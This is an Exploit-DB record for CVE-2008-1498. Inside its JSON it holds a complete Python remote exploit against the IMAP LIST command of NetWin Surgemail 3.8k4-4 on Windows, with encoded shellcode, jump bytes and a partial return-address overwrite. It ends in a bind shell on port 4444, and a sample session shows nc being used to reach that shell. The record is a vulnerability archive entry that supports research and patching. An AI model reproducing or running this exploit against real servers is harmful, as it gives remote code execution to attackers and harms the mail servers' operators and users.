NetWin Surgemail 3.8k4-4 - IMAP post-auth Remote LIST Universal Exploit

{"bulletinFamily": "exploit", "id": "EDB-ID:5259", "cvelist": ["CVE-2008-1498"], "modified": "2008-03-14T00:00:00", "lastseen": "2016-01-31T21:52:28", "edition": 1, "sourceData": "#!/usr/bin/python\r\n###############################################################################\r\n#\r\n# NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Universal Exploit \r\n# Discovered and coded by Matteo Memelli aka ryujin \r\n# http://www.gray-world.net http://www.be4mind.com\r\n#\r\n# Affected Versions : Version 3.8k4-4 Windows Platform\r\n# Tested on OS : Windows 2000 SP4 English\r\n# Windows XP Sp2 English\r\n# Windows 2003 Standard Edition Italian\r\n# Discovery Date : 03/13/2008\r\n#\r\n#-----------------------------------------------------------------------------\r\n#\r\n# Thx to muts _[at]_ offensive-security.com \r\n# for the \"Partial Overwrite\" Suggestion :) Now I know it works!\r\n#\r\n#-----------------------------------------------------------------------------\r\n##############################################################################\r\n#\r\n# matte@badrobot:~/surgemail$ ./surgemail_list.py -H 192.168.1.245 -P 143 -l \\\r\n# test -p test\r\n#\r\n# [*********************************************************************]\r\n# [* *]\r\n# [* NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Exploit *]\r\n# [* Discovered and Coded By *]\r\n# [* Matteo Memelli *]\r\n# [* (ryujin) *]\r\n# [* www.be4mind.com - www.gray-world.net *]\r\n# [* *]\r\n# [*********************************************************************]\r\n# [+] Connecting to imap server...\r\n# * OK IMAP ryujin (Version 3.8k4-4)\r\n#\r\n# [+] Logging in...\r\n# 0001 OK LOGIN completed\r\n#\r\n# [+] PWNING IN PROGRESS :) ...\r\n# [+] DONE! Check your shell on 192.168.1.245:4444\r\n# matte@badrobot:~/surgemail$ nc 192.168.1.245 4444\r\n# Microsoft Windows XP [Version 5.1.2600]\r\n# (C) Copyright 1985-2001 Microsoft Corp.\r\n#\r\n# c:\\surgemail>ipconfig\r\n# ipconfig\r\n#\r\n# Windows IP Configuration\r\n#\r\n#\r\n# Ethernet adapter Local Area Connection:\r\n#\r\n# Connection-specific DNS Suffix . : \r\n# IP Address. . . . . . . . . . . . : 192.168.1.245\r\n# Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n# Default Gateway . . . . . . . . . : 192.168.1.197\r\n#\r\n# c:\\surgemail>\r\n#\r\n##############################################################################\r\n\r\nfrom socket import *\r\nfrom optparse import OptionParser\r\nimport sys, time\r\n\r\nprint \"[*********************************************************************]\"\r\nprint \"[* *]\"\r\nprint \"[* NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Exploit *]\"\r\nprint \"[* Discovered and Coded By *]\"\r\nprint \"[* Matteo Memelli *]\" \r\nprint \"[* (ryujin) *]\" \r\nprint \"[* www.be4mind.com - www.gray-world.net *]\"\r\nprint \"[* *]\"\r\nprint \"[*********************************************************************]\"\r\nusage = \"%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD\"\r\nparser = OptionParser(usage=usage)\r\nparser.add_option(\"-H\", \"--target_host\", type=\"string\",\r\n action=\"store\", dest=\"HOST\",\r\n help=\"Target Host\")\r\nparser.add_option(\"-P\", \"--target_port\", type=\"int\",\r\n action=\"store\", dest=\"PORT\",\r\n help=\"Target Port\")\r\nparser.add_option(\"-l\", \"--login-user\", type=\"string\",\r\n action=\"store\", dest=\"USER\",\r\n help=\"User login\")\r\nparser.add_option(\"-p\", \"--login-password\", type=\"string\",\r\n action=\"store\", dest=\"PASSWD\",\r\n help=\"User password\")\r\n(options, args) = parser.parse_args()\r\nHOST = options.HOST\r\nPORT = options.PORT\r\nUSER = options.USER\r\nPASSWD = options.PASSWD\r\nif not (HOST and PORT and USER and PASSWD):\r\n parser.print_help()\r\n sys.exit()\r\n\r\nNOPES = \"\\x90\"*9654\r\nSJUMP = \"\\xEB\\xF9\\x90\\x90\" # Jmp Back\r\nNJUMP = \"\\xE9\\xDD\\xD7\\xFF\\xFF\" # And Back Again Baby ;) \r\n# Partial Overwrite: 0x00 not allowed in buffer and all poppopret\r\n# begin with 0x00 in surgemail.exe \r\nRET = \"\\x7e\\x51\\x78\" \r\nSHELLCODE = (\r\n#[*] x86/alpha_mixed succeeded, final size 697\r\n\"\\x89\\xe0\\xd9\\xeb\\xd9\\x70\\xf4\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\\x41\"\r\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\r\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\"\r\n\"\\x4c\\x43\\x5a\\x4a\\x4b\\x50\\x4d\\x4d\\x38\\x4b\\x49\\x4b\\x4f\\x4b\\x4f\"\r\n\"\\x4b\\x4f\\x43\\x50\\x4c\\x4b\\x42\\x4c\\x47\\x54\\x46\\x44\\x4c\\x4b\\x50\"\r\n\"\\x45\\x47\\x4c\\x4c\\x4b\\x43\\x4c\\x44\\x45\\x44\\x38\\x45\\x51\\x4a\\x4f\"\r\n\"\\x4c\\x4b\\x50\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x51\\x30\\x43\\x31\\x4a\"\r\n\"\\x4b\\x50\\x49\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x45\\x51\\x4a\\x4e\\x50\\x31\"\r\n\"\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4b\\x34\\x49\\x50\\x42\\x54\\x44\\x47\\x49\"\r\n\"\\x51\\x48\\x4a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4b\\x44\\x47\\x4b\"\r\n\"\\x50\\x54\\x51\\x34\\x47\\x58\\x44\\x35\\x4a\\x45\\x4c\\x4b\\x51\\x4f\\x46\"\r\n\"\\x44\\x45\\x51\\x4a\\x4b\\x45\\x36\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x4c\\x4b\"\r\n\"\\x51\\x4f\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x43\\x33\\x46\\x4c\\x4c\\x4b\\x4b\"\r\n\"\\x39\\x42\\x4c\\x51\\x34\\x45\\x4c\\x43\\x51\\x48\\x43\\x46\\x51\\x49\\x4b\"\r\n\"\\x43\\x54\\x4c\\x4b\\x51\\x53\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44\\x4c\\x4c\"\r\n\"\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x51\\x50\\x45\\x58\\x51\\x4e\"\r\n\"\\x43\\x58\\x4c\\x4e\\x50\\x4e\\x44\\x4e\\x4a\\x4c\\x46\\x30\\x4b\\x4f\\x4e\"\r\n\"\\x36\\x42\\x46\\x46\\x33\\x43\\x56\\x42\\x48\\x47\\x43\\x46\\x52\\x45\\x38\"\r\n\"\\x44\\x37\\x44\\x33\\x46\\x52\\x51\\x4f\\x46\\x34\\x4b\\x4f\\x4e\\x30\\x45\"\r\n\"\\x38\\x48\\x4b\\x4a\\x4d\\x4b\\x4c\\x47\\x4b\\x50\\x50\\x4b\\x4f\\x48\\x56\"\r\n\"\\x51\\x4f\\x4d\\x59\\x4d\\x35\\x43\\x56\\x4b\\x31\\x4a\\x4d\\x45\\x58\\x45\"\r\n\"\\x52\\x46\\x35\\x43\\x5a\\x44\\x42\\x4b\\x4f\\x4e\\x30\\x45\\x38\\x48\\x59\"\r\n\"\\x45\\x59\\x4a\\x55\\x4e\\x4d\\x46\\x37\\x4b\\x4f\\x49\\x46\\x51\\x43\\x46\"\r\n\"\\x33\\x50\\x53\\x51\\x43\\x51\\x43\\x50\\x43\\x50\\x53\\x47\\x33\\x46\\x33\"\r\n\"\\x4b\\x4f\\x48\\x50\\x45\\x36\\x45\\x38\\x42\\x31\\x51\\x4c\\x43\\x56\\x51\"\r\n\"\\x43\\x4d\\x59\\x4d\\x31\\x4a\\x35\\x45\\x38\\x4e\\x44\\x45\\x4a\\x42\\x50\"\r\n\"\\x48\\x47\\x46\\x37\\x4b\\x4f\\x49\\x46\\x43\\x5a\\x42\\x30\\x46\\x31\\x46\"\r\n\"\\x35\\x4b\\x4f\\x4e\\x30\\x43\\x58\\x49\\x34\\x4e\\x4d\\x46\\x4e\\x4b\\x59\"\r\n\"\\x46\\x37\\x4b\\x4f\\x48\\x56\\x50\\x53\\x51\\x45\\x4b\\x4f\\x4e\\x30\\x43\"\r\n\"\\x58\\x4b\\x55\\x50\\x49\\x4b\\x36\\x47\\x39\\x51\\x47\\x4b\\x4f\\x48\\x56\"\r\n\"\\x46\\x30\\x50\\x54\\x46\\x34\\x46\\x35\\x4b\\x4f\\x4e\\x30\\x4d\\x43\\x45\"\r\n\"\\x38\\x4a\\x47\\x42\\x59\\x48\\x46\\x44\\x39\\x50\\x57\\x4b\\x4f\\x4e\\x36\"\r\n\"\\x50\\x55\\x4b\\x4f\\x4e\\x30\\x43\\x56\\x42\\x4a\\x42\\x44\\x45\\x36\\x45\"\r\n\"\\x38\\x45\\x33\\x42\\x4d\\x4b\\x39\\x4d\\x35\\x43\\x5a\\x50\\x50\\x46\\x39\"\r\n\"\\x51\\x39\\x48\\x4c\\x4c\\x49\\x4d\\x37\\x42\\x4a\\x51\\x54\\x4b\\x39\\x4d\"\r\n\"\\x32\\x50\\x31\\x49\\x50\\x4a\\x53\\x4e\\x4a\\x4b\\x4e\\x47\\x32\\x46\\x4d\"\r\n\"\\x4b\\x4e\\x47\\x32\\x46\\x4c\\x4d\\x43\\x4c\\x4d\\x43\\x4a\\x46\\x58\\x4e\"\r\n\"\\x4b\\x4e\\x4b\\x4e\\x4b\\x45\\x38\\x42\\x52\\x4b\\x4e\\x48\\x33\\x42\\x36\"\r\n\"\\x4b\\x4f\\x43\\x45\\x47\\x34\\x4b\\x4f\\x48\\x56\\x51\\x4b\\x50\\x57\\x51\"\r\n\"\\x42\\x50\\x51\\x46\\x31\\x46\\x31\\x42\\x4a\\x43\\x31\\x46\\x31\\x50\\x51\"\r\n\"\\x51\\x45\\x46\\x31\\x4b\\x4f\\x48\\x50\\x43\\x58\\x4e\\x4d\\x4e\\x39\\x43\"\r\n\"\\x35\\x48\\x4e\\x50\\x53\\x4b\\x4f\\x4e\\x36\\x42\\x4a\\x4b\\x4f\\x4b\\x4f\"\r\n\"\\x50\\x37\\x4b\\x4f\\x4e\\x30\\x4c\\x4b\\x51\\x47\\x4b\\x4c\\x4c\\x43\\x49\"\r\n\"\\x54\\x45\\x34\\x4b\\x4f\\x49\\x46\\x51\\x42\\x4b\\x4f\\x48\\x50\\x45\\x38\"\r\n\"\\x4a\\x4f\\x48\\x4e\\x4d\\x30\\x45\\x30\\x51\\x43\\x4b\\x4f\\x49\\x46\\x4b\"\r\n\"\\x4f\\x4e\\x30\\x44\\x4a\\x41\\x41\")\r\n\r\ns = socket(AF_INET, SOCK_STREAM)\r\nprint \" [+] Connecting to imap server...\"\r\ns.connect((HOST, PORT))\r\nprint s.recv(1024)\r\nprint \" [+] Logging in...\"\r\ns.send(\"0001 LOGIN %s %s\\r\\n\" % (USER, PASSWD))\r\nprint s.recv(1024)\r\nprint \" [+] PWNING IN PROGRESS :) ...\"\r\nEVIL = NOPES + SHELLCODE + NJUMP + SJUMP + RET\r\ns.send('0002 LIST () \"/' + EVIL + '\" \"PWNED\"\\r\\n')\r\nprint \" [+] DONE! Check your shell on %s:%d\" % (HOST, 4444)\r\ns.close()\r\n\r\n# milw0rm.com [2008-03-14]\r\n", "published": "2008-03-14T00:00:00", "href": "https://www.exploit-db.com/exploits/5259/", "osvdbidlist": ["43853"], "reporter": "ryujin", "hash": "72f465a26463a1048d4a3dc13a268f942327a04a82d268d22cdb0da1f945cf14", "title": "NetWin Surgemail 3.8k4-4 - IMAP post-auth Remote LIST Universal Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "NetWin Surgemail 3.8k4-4 IMAP post-auth Remote LIST Universal Exploit. CVE-2008-1498. Remote exploit for windows platform", "references": [], "cvss": {"score": 9, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/5259/", "enchantments": {"vulnersScore": 5.5}}